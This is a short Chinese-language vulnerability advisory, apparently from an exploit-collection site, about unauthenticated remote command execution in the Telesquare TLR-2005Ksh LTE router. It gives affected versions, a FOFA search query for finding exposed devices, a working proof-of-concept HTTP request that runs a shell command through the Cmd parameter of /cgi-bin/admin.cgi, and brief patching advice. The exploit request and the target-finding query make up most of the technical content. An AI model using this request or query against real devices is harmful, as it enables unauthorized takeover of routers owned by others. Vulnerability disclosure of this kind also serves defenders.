0x01 产品简介
Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款Sk 电讯Lte 路由器。
0x02 漏洞概述
Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
0x03 影响范围
1.0.0 < version < 1.1.4
0x04 复现环境
FOFA:app="TELESQUARE-TLR-2005KSH"
0x05 漏洞复现
PoC
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls%20-la HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.55
Connection: close
Accept: */*
Accept-Encoding: gzip
0x06 修复建议
关闭互联网暴露面或接口设置访问权限
官方已发布最新补丁,请升级至最新版本